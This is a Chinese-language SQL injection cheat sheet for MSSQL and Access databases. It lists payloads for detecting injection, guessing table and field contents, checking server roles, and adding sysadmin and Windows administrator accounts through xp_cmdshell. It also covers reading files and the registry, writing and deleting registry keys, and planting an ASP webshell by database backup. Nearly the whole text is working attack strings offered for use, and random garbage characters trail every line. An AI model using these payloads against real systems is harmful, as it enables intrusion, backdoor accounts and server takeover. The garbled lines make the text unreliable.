1.判断是否有注入;and 1=1 ;and 1=2 [�[_�>D�M
2.初步判断是否是mssql ;and user>0 x]YzVJ��=Y
a�
7�v^o`�
3.注入参数是字符'and [查询条件] and ''=' V�S4Glx7�3
�bX[ZV�E(L
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ;^s|n�)F#c
\�x�$�`/��
5.判断数据库系统 m�K�TF@DED
;�fV"5H)U\
;and (select count(*) from sysobjects)>0 mssql d.� d J^�M
\<9aS �Y'U
;and (select count(*) from msysobjects)>0 access R-$w��*�=Y
]��UI�N�4E
{_�W8�Qm`.
v�2rzHz�FU
6.猜数据库 ;and (select Count(*) from [数据库名])>0 5f_x.�~ymA
c^"4��l
9w
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 n�v�0D�4 t
851BOkRal4
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 5X3J�Q"z��
t�HaHBx1P�
9.(1)猜字段的ascii值(access) bkR~>F]FAu
�X�)(K�|[�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 |63uoRr��
~9�rNP{�+
(2)猜字段的ascii值(mssql) D4"<suU|�.
vD�2(M1Q��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 :?E�Z\W�M7
Lm!]m\LRZD
10.测试权限结构(mssql) �Uth+4A��q
$�C=XSuPNK
c�{`!$Z'k<
(�(AK�7�hb
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- PC"=B[�OlJ
4D�5W�se�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- D$K�P��>G
| J'k�9W�"
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �R�pU� i'�
(Of`VT3ZOA
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- $�#%R�_G]�
l %zb�x"%x
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ii��u��T:r
�x]N�x,tt�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- gCYe��^K�J
|�H8C4^1Rq
;and 1=(select IS_MEMBER('db_owner'));-- Uu��n0FCA>
)6"�p@�1\u
�BGVn�L}0�
}'{"P#e8"q
11.添加mssql和系统的帐户 X9c�<�g;�
6�f�0�o'��
;exec master.dbo.sp_addlogin username;-- >8{{H"$;(�
;exec master.dbo.sp_password null,username,password;-- u1kCvi#N�
H!�FaI(YZl
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ?$�I��9/r�
,;�MUX�CC'
;exec master.dbo.xp_cmdshell 'net user username password Dg~m��}La
Q�<�s�zH1-
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ,d!�@5d&Zi
f"\klfrRI_
;exec master.dbo.xp_cmdshell 'net user username password /add';-- #v$�wjq�K5
-1$z��=,q'
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- O�Rqqz�y +
(� +S���-
�<�����j��
�g<DXJ�7�o
12.(1)遍历目录 _H}hK kG+�
3GL?&(�eU;
;create table dirs(paths varchar(100), id int) �Y$�,�++wx
~c+�=$SL-=
;insert dirs exec master.dbo.xp_dirtree 'c:\' �7r3C�O<fb
*\+oe+��3�
;and (select top 1 paths from dirs)>0 T6?��03cSE
#CJ���E�T�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �[T'[7���Z
c�#�?~1@�=
�Bk~��lM'
%�H_�-`�A`
(2)遍历目录 qfAnMBM1�@
vEG7A$Z�"�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- c�9@3�=6S/
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 #u"��@q< )
FP y}Wc*UA
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �fhdq�es])
rT-�.'aQ2t
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 t0xE&�#4��
LH`$<p2''r
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 a_\�7H�o$^
�x~m$�(L�T
s L�D���Ea
u46Z}~xf�b
13.mssql中的存储过程 ��>�X[:(m'
7[L%j;)�bw
xp_regenumvalues 注册表根键, 子键 iBWE�Z�w�)
M��E)='�~E
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 W! |_ �hL�
�Bn.R,B0PL
xp_regread 根键,子键,键值名 E@Ewx;P5�
g@t..x��J,
;exec xp_regread B4zu�WCE@�
]�m��&S�s�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �?|`n&Hr�P
Az�(,Q$"|5
xp_regwrite 根键,子键, 值名, 值类型, 值 ��gDw(_KC�
,'�<N�yA><
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �U0|b��KU�
#PC*��l\
)
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 DqI��"��B�
"9X(.v0ze�
xp_regdeletevalue 根键,子键,值名 �8"�LM:0�x
[EVyCIcY,h
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
C>-}BeY!
S,,Wb��&A$
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �i��B~dO @
�^%6f%]�_�
�QYj�� �4D
",5=LW&,
14.mssql的backup创建webshell 1o��_�Zw�.
4__HH~j�?Q
use model ]$.w
I�~J%
�'U�GgY3
create table cmd(str image); "9~KVILlLu
U5�F1m]gFr
insert into cmd(str) values (''); �bz,"TG�[�
�=_6 Q��26
backup database model to disk='c:\l.asp'; �yk^2<?z>2
,s��}7�KE
1j�}��e2�H
�(KvN#d 1\
15.mssql内置函数 %Zfh6B�l\X
U3M;�{�_g�
;and (select @@version)>0 获得Windows的版本号 <)J@�7@!P
�A??a:8id^
;and user_name()='dbo' 判断当前系统的连接用户是不是sa JHg;2xm"<K
8A*tpMV?J�
;and (select user_name())>0 爆当前系统的连接用户 i$:yq.�D�W
)$pqe��|,�
;and (select db_name())>0 得到当前连接的数据库 P�;X0L{u0H
�PVN`k, �4
tp�� k��y�
�l �Ny<E!0
16.简洁的webshell f*m�^x�7
#!m^E�qF1_
use model gI�d�
:I�R
'Vhnio;q�C
create table cmd(str image); 8�[
Z�uVJ]
)�5x$J01S�
insert into cmd(str) values (''); fkk9&�QB%(
iP9�Dr<�P�
backup database model to disk='g:\wwwtest\l.asp';
